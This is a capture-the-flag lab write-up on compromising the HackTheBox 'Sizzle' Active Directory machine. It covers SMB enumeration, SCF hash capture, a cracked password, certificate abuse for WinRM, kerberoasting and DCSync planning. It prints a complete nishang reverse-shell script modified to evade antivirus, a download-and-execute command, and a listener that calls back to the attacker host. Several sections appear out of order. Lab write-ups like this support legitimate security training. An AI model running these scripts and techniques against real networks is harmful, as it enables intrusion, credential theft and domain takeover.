PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -34s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
443/tcp open ssl/http Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
| tls-alpn:
| h2
|_ http/1.1
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-title: Site doesn't have a title (text/html).
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after: 2020-07-02T17:58:55
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
| h2
|_ http/1.1
|_ssl-date: 2023-12-14T00:53:05+00:00; -33s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after: 2019-07-02T20:26:23
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-14T00:52:29
|_ start_date: 2023-12-14T00:48:26
|_clock-skew: mean: -33s, deviation: 0s, median: -33s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.99 seconds
from the results we can see
the Domain name: HTB.LOCAL lets add this to our hosts file
The common name: SIZLE we'll add this to the hosts file also
Port 21 (FTP) allows for anonymous authentication
Port 80 (HTTP) is running: Microsoft IIS httpd 10.0 Indicating this is very likely a windows machine
Initial Enumeration via Anonymous
Port 53 DNS
Let see if we can perform a zone transfer using dig
dig axfr @10.10.10.103 htb.local
No results (failed)
Port 21 FTP
Since anonymous authentication is permitted within the FTP service lets see if we can find any juicy information
ftp anonymous@10.10.10.103
authentication was successful
No information within FTP
Port 445 SMB
Let's see if SMB allows for anonymous authentication
crackmapexec smb 10.10.10.103 -u anonymous -p ''
successful
let's list the shares and see if we can find anything
spider plus: will crawl the smb shares we have access to and jump what they contain within a JSON file, then this JSON file is saved within the /tmp/cme_spider_plus/<target ip>.json
lets clean up the JSON file so it is easier to view
if we look at the Users directory we can see a list of possible users for the machine
we can save these user to a file and perform some bash kung fu to clean them up
cat users| awk '{print $1}' > usernames.txt
Lets mount the Department Shares to our local machine for ease of inspecting these files
sudo mount -t cifs '//10.10.10.103/Department Shares' /mnt
Letts see if we have any write access within the share
for this we can use the tool smbcacls: what does it do
Set or Get Access Control lists on a NT file or directory names, essentially we can use this tool to check for writeable files and direcotries within the Department Shares
#!/bin/bash
# Iterate over each directory in /mnt
for dir in $(ls /mnt); do
# Iterate over each subdirectory in the current directory
for subdir in $(ls /mnt/$dir); do
# Use smbcacls to check permissions of the current subdirectory
# -N option specifies no credentials (anonymous)
smbcacls "//10.10.10.103/Department Shares" "$dir/$subdir" -N |
# Check if "everyone" has "full control" permissions
grep -i everyone | grep -i full > /dev/null &&
# Print a message if write permissions are found
echo "[*] Directory $dir/$subdir: Write permissions"
done
done
Once we run this script
bash find_writeable.sh
we can see we have the following write permissions
We are going to create a SCF file that will attempt a SMB connection to our local machine which we can capture a users password hash, our SCF file should contain the following
we are going to place this SCF file within the writeable directory Users/Public in the SMB share, cp file.scf /mnt/Users/Public
when the user opens this directory this should execute the malicous SCF file and attempt and smb connection back to our local machine from which we will be running impacket-smbserver.py and capture the users password hash
impacket-smbserver shrek123 ./ -smb2support
we wait a few minutes and we have the password hash of the user amanda
Lets crack the password using hashcat, quick tip as we know this is a NetNTLMv2 hash we need to find the correct mode for hash cat we can grep it
For good measure, Let's see if any of the files residing the ZZ_ARCHIVE Contain any data
Lets use create a bash script that will check for files that dont contain null bytes using the xxd
for file in /mnt/ZZ_ARCHIVE/*; do
hex_dump=$(xxd -p "$file")
# Check if the hex dump contains any non-null characters
if [[ "$hex_dump" != "00000000"* ]]; then
echo "Hex dump for non-null file: $file"
echo "$hex_dump"
echo "-------------------------"
fi
done
When we navigate to http://htb.local we can see the following
what we can see is
we can confirm that it is Microsoft ASP.NET framework
it is a windows server
if we look at the page source we can see the following
pretty dry
if we navigate to http://sizzle and http://sizzle.htb.local nothing changes within the webpages meaning there is most likely no virtual host routing
Port 443 HTTPS
Nothing new
Looking at the certificate we can see the following
if we look at the common name we can see HTB-SIZZLE-CA which is a certificate authority, meaning that it is likely someone configured a certificate authority on this box which is interesting
We can see when it was created and when it expires
03 july 2018 - 02 july 2020
we can perform some dir busting using feroxbuster to see if we can find any hidden web pages on both the http and https
we can see we have read access to other shares now
more particularly the CertEnroll share we will visit this once we have checkout the other services
Notice for the CertEnroll share description: Active Directory Certificate Services share
When opening the link we can see the following
using amanda's credentials amanda: Ashare1972
we can access the Microsoft Active Directory Certificate Services, Now what can we actually do with this? and what is it exactly?
what is Microsoft Active Directory Certificate Services?
Active Directory Certificate Services (AD CS) is essentially a role within the Windows Server OS that implements Public Key Infrastructure (PKI) services. PKI Involves the use of cryptographic keys and certificates to ensure Communication and authenticateusers (hint hint) and devices, its main goal is to ensure confidentiality and integrity of data
How we can exploit this?
essentially we are going to generate a certificate, we are going to use CertSRV to sign our certificate as Amanda, Which should authenticate us when we are PSRemoting into the machine
Steps
Generate a private key using openssl
openssl genrsa -aes256 -out amanda.key 2048
# will be prmoted for password "password"
we want to generate a new certificate signing request (CSR) Using our newly created private key amanda.key
openssl req -new -key amanda.key -out amanda.csr
Now we want to get our certificate signing request signed within the AD CS we take our amanda.csr copy it
Once we have bloodhound open its always good practice to mark what users we have owned
amandas
groups
USERS
DOMAIN USERS
REMOTE MANAGEMENT USERS
when we list all of the kerberoastable account we can see something interesting
this indicates kerberoast is on the machine, must be running internally possible, well keep this in mind
Does this MRLKY have any thing we can utilize
when we look at the users First Degree Object Control we can see the user MRLKY has the following rights to the Domain Controller
DCSync
GetChangesAll
GetChanges
Meaning if we can compromise the MRLKY Account we requests data from the domain controller (NTDS.dit which contains all the domain users hashes)
Looking at the reachable High Value Target we can see our user amanda can CanPSRemote to the SIZZLE.HTB.LOCAL computer, knowing we have a kerberoastable account MRLKY , we can possibly compromise the account and from here as the user MRLKY perform a DCsync attack and retreive the NTDS.dit file, from here
Lets perform a ldapdomindump for good measures and see if we can find anything else
Now we have a PSRemote session on the target server, and we know of the kerberoastable user mrlky we can load in powerview and perform some kerberoasting
Lets load PowerView.ps1 onto the target
start a python3 server python3 -m http.server 80
Download the script and execute it IEX(iwr http://10.10.14.7/PowerView.ps1 -UseBasicParsing)
What interesting is that AV detected this, we also try and download the file without executing it and we get a permission denied
We can see the line
Cannot create type. Only core types are supported in this language mode.Meaning we have limited functionality in PowerShell
ScriptContainedMaliciousContent meaning we have AV upon us
We can check our current language mode in session
$ExecutionContext.SessionState.LanguageMode
Lets handle one thing at a time, current objective
we need to bypass our current language mode
we ned to bypass the AV and execute PowerView.ps1
Bypassing Our current language mode
Plan A
Lets upload a nishang reverse shell and see if we can establish another shell without the language constraints
once we have moved the Invoke-PowerShellTcp.ps1 into our current working directory we want to modify it slightly just to bypass any AV that may pick it up
function shrek123
{
<#
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(
[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,
[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,
[Parameter(ParameterSetName="bind")]
[Switch]
$Bind
)
try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}
#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
shrek123 -Reverse -IPAddress 10.10.14.7 -Port 9001
Notice we have deleted any comments and change the function name hopefully this is a basic AV and we can execute this under the radar
Lets set up a nc listner rlwrap -cAr nc -lvnp 9001
set up a python server for our target to download it from python3 -m http.server 80
Lets use wget and see if we can download the file onto the target
Now lets create a PSCredential Object$Cred using amanda's credentials
# create a secure string holding the password
$Password = ConverTo-SecureString 'Ashare1972' -AsPlainText -Force
# create a PSCredential Object
$Cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\amanda', $Password)
Now that we have a PScredential Object created we can use amanda's credentials to communicate with the kerberose service and perform the attack, we can use the
Invoke-Kerberoast -Credential $Cred -Verbose | fl
We know have mrlky ticket lets crack this
Couple of quick tips since we are using vim as our text editor we want to remove all whitespaces and new lines we can do this by
Now if we can write to a directory there is something called SCF (Shell Command Files) files, this is a good blog to brush up on But essentially its a shortcut file in windows that allows for the execution of specific commands or scripts when a user opens the directory the files resides in, Now how can this be useful to us
Quick google and we find this: : essentially it tells us we can the Microsoft Active Directory Certificate Services through a web page located (in our case) https://sizzle/certsrv/
Now we can utilize our new certificate, and key and WinRM into the machine, quick google lead me to this which essentially shows us how to authenticate to winrm on port 5986 (https) using a certificate so steps
